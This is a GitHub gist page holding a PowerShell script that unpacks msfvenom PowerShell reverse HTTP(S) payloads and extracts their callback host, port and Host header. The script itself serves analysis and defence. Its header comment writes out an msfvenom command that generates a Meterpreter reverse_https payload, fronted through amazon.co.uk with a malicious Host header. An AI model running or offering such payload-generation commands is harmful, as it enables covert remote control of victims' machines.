Last active
December 22, 2018 10:21
-
-
Save vp777/0ab2783a07a7e1d3cb9eb8463683e493 to your computer and use it in GitHub Desktop.
Extract info from at least the psh-cmd reverse http(s) payloads generated by msfvenom.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
${msfvenom} -p windows/meterpreter/reverse_https LHOST=amazon.co.uk LPORT=443 HttpHostHeader=malicious.domain -f psh-cmd -o rev.cmd | |
MSFVenom-Info -Name rev.cmd | |
Output: | |
amazon.co.uk:443 | |
Host: malicious.domain | |
#> | |
Function Find-Pattern { | |
Param ( | |
[Parameter(Mandatory=$True)] | |
[byte[]]$Array, | |
[Parameter(Mandatory=$True)] | |
[int[]]$Pattern | |
) | |
Process { | |
$pfound = 0 | |
:_findPattern_found for ($i=0;$i -lt ($Array.Length-$Pattern.Length+1);$i++){ | |
for ($j=0;$j -lt $Pattern.Length;$j++){ | |
if ($Pattern[$j] -eq -1) {continue} | |
if ($Array[$i+$j] -ne $Pattern[$j]) {break} | |
if ($j -eq $Pattern.Length-1) {$pfound = 1;break _findPattern_found} | |
} | |
} | |
if(!$pfound){ | |
return -1 | |
} | |
return $i | |
} | |
} | |
Function MSFVenom-Info { | |
[cmdletbinding()] | |
Param ( | |
[Parameter(Mandatory=$True, ParameterSetName="p1")] | |
[string]$Name, | |
[Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p2")] | |
[string]$FileContent, | |
[switch]$DebugMode, | |
[switch]$GenerateHex, | |
[switch]$LastScript | |
) | |
Process { | |
if ($PsCmdlet.ParameterSetName -eq "p1") { | |
$infile = (Resolve-Path "$Name").Path | |
$content = [IO.File]::ReadAllText("$infile").Trim() | |
} else { | |
$content = $FileContent.Trim() | |
} | |
$firstStage = ($content -split " ")[-1] | |
$content1 = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($firstStage)) | |
$content1 -match "FromBase64String.+?\)" > $null | |
$secondStage = $Matches[0].split("'", [System.StringSplitOptions]::RemoveEmptyEntries)[1] | |
$s2=New-Object IO.MemoryStream(, [Convert]::FromBase64String($secondStage)) | |
$content2 = (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s2,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd() | |
if ($LastScript.IsPresent) { | |
$content2 > lastscript.txt | |
} | |
$content2 -match "FromBase64String.+?\)" > $null | |
$thirdStage = $Matches[0].split("'|""", [System.StringSplitOptions]::RemoveEmptyEntries)[1] | |
$shellcode = [Convert]::FromBase64String($thirdStage) | |
if ($GenerateHex.IsPresent) { | |
[System.BitConverter]::ToString($shellcode) -replace '-' > hexshell.txt | |
} | |
if ($DebugMode.IsPresent) { | |
$shellcode > debug_shell.txt | |
} | |
$revhttp_imm8 = @(106, 3, 83, 83, 106) | |
$revhttp_imm32 = @(106, 3, 83, 83, 104, -1, -1, 0, 0) | |
$i = Find-Pattern $shellcode $revhttp_imm8 | |
if( $i -ne -1 ){ | |
$port = $shellcode[$i+$revhttp_imm8.Length] | |
} else { | |
$i = Find-Pattern $shellcode $revhttp_imm32 | |
if ($i -eq -1) { | |
"Couldn't find the port pattern" | |
return 1 | |
} | |
$port = $shellcode[$i+5]+$shellcode[$i+6]*256 | |
} | |
$pattern = @(255, 255, 255) | |
$cshellcode = $shellcode | |
$i = 0 | |
$rhost="" | |
while (([regex]::Matches($rhost, "\." )).count -ne 3){ | |
$cshellcode = $cshellcode | Select-Object -Skip $i | |
$i = Find-Pattern $cshellcode $pattern | |
if( $i -eq -1 ){ | |
break | |
} | |
$i+=$pattern.Length | |
$k=0 | |
while ($cshellcode[$i+$k]){$k++} | |
$rhost = [System.Text.Encoding]::ASCII.GetString($cshellcode[$i..($i+$k-1)]) | |
} | |
"${rhost}:${port}" | |
$ashell = [System.Text.Encoding]::ASCII.GetString($shellcode) | |
$header_host=[regex]::Match($ashell, "(?i:Host): ?[\w\.:]+") | |
if ($header_host.Value) { $header_host.Value } | |
"`nRest of the printable strings:" | |
$printable=[regex]::Matches($ashell, "[\w\.:]{10,}") | |
for ($i=0; $i -lt $printable.Count; $i++){ | |
$printable[$i].Value | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment